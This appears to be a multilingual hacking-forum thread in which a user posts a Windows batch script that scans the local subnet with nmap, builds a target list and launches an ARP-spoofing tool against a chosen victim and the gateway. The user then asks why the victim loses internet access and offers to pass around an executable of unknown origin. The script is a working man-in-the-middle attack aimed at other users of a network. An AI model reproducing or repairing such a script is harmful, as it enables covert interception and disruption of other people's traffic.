Página 1 de 1

Ataque arpspoof Windows

Publicado: 20 Jul 2022, 18:50
por FaltaDEiN fORmAO
good afternoon i have a problem with this attack i made a mini script in bat and it works correct.

But when it starts to clone the victim's ip, my computer does not return the connection to her, that is, the victim no longer has access to the internet

how can I solve?

Re: Ataque arpspoof Windows

Publicado: 05 Ago 2022, 04:41
por Flight embedded
Hola. Si compartís aquí tu "mini script" quizás alguien te pueda ayudar. 
 

Publicado: 09 Ago 2022, 17:16
por FaltaDEiN fORmAO
OK. então sendo assim tenho aqui três scripts em bat
[código]#bat script #Tenho este script dividido em 3 partes
######1 partes ##################
cd desktop

cls

set ip4= 
for /f "tokens=14 skip=1 delims= " %%a in ('"ipconfig | find /i "192.168""') do set ip4=%%a

set gateway=
for /f "tokens=13 skip=2 delims= " %%b in ('"ipconfig | find /i "192.168""') do set gateway=%%b


echo.
echo (Analisando o Trafego)-----(IP ATIVOS)

:nmap -A da para ver os host do pc ou seja oseu nome 
:falta ver o scan no nmap depois resolver os ips para ser mais rapido 

if exist targets.txt (goto ab) else (goto lol)

:lol
nmap -sn %ip4%/24 --exclude=%ip4% | find /i "192.168."
cls
echo (Analisando o Trafego)-----(IP ATIVOS)
echo.
echo  $$$$$$$$$$$$$$$$$$$$$$$$$$$$$
echo $__$$$$$$$___________$$$$$$$  $
echo $_____$$$$$$$$_______$$$$$$$$ $
echo $______$$$$$$$$$_____$$$$$$$  $
echo $________$$$$$$$$____$$$$$$$  $
echo $_________$$$$$$$$$__$$$$$$   $
echo $____________$$$$$$$$$$$$$    $
echo $_______________$$$$$$$$$     $
echo $__________$$$$$$$$$$$$$      $
echo $________$$$$$$$$$$$$$$$$     $
echo $_______$$$$___$$$$$$$$$$     $
echo $______$$$$$__$$$$$$$$$$$$    $
echo $_____$$$$$$$$$$$$$$$$$$$     $
echo $______$$$$$$$$$$$$$$$$$$$    $
echo $_______$$$$$$$$$$$$$$$$$     $
echo $___________$$$$$$$$$$$$$     $
echo $__________$$$$$$$$$$$$$      $
echo  $$$$$$$$$$$$$$$$$$$$$$$$$$$$$
echo.
echo A Listar IP DA SUB-RED loading..... 
echo.

for /f "tokens=5 delims= " %%a in ('"nmap -sn %IP4%/24 --exclude=%IP4% | find /i "192.168""') do echo %%a >> targets.txt


start targets.bat
:ab
echo.

set /P vit=ipDaVitima :



echo.
echo xxxxxxxxxxxx
echo xARPSOOFINGx 
echo xxxxxxxxxxxx
echo.

start /MIN arp.bat
start arpoosing.bat
 

ArpSpoofing.exe -i %ip4% -v %vit% -g %gateway%



----------- -------------------------------------------------- ---
######2 partes #################
@Echo off

mode con: lines=10 cols=50
color f2

type targets.txt


pause>nul

######3 partes ## ################
@Echo off echo. 
ArpSpoofing.exe -i %ip4% -v %gateway% -g %vit%
 
hope you can help me

remembering that the script carries out the attack like this by cloning the victim's mac address but it doesn't give him back the internet making the attack useless because the victim is without internet

Publicado: 12 Ago 2022, 04:18
por FaltaDEiN fORmAO
 Como editar uma postagem? é que reformulei o script para facilitar a execução dos 3 juntos em um.

É possível fazer um ataque mitm no Windows?
Gostaria de saber a diferença entre caim e abel e essa harpa? 
Infelizmente não sei de onde baixei este executável do github, então se alguém quiser dar uma olhada, me mande uma mensagem privada e eu te dou o executável (100 legeit sem vírus)
 

Publicado: 07 Jul 2023, 16:34
por FaltaDEiN fORmAO
Flight embedded" escribió: 05 Ago 2022, 04:41 Hola. Si compartís aquí tu "mini script" quizás alguien te pueda ayudar. 

 
Bringing this post to life

if the admins can delete the other posts it would be more organized.


Next on windows I'm using an .exe to do a man-in-the-middle attack (arspoofing)

The problem is that when I start the attack the victim no longer has internet.

It's like to send a DDOS

Could someone test it to see if it works?

Could it be that it has to do with my router?
or with the pc that is very old?
or the firewall?

[email][Enlace externo eliminado para invitados][/email]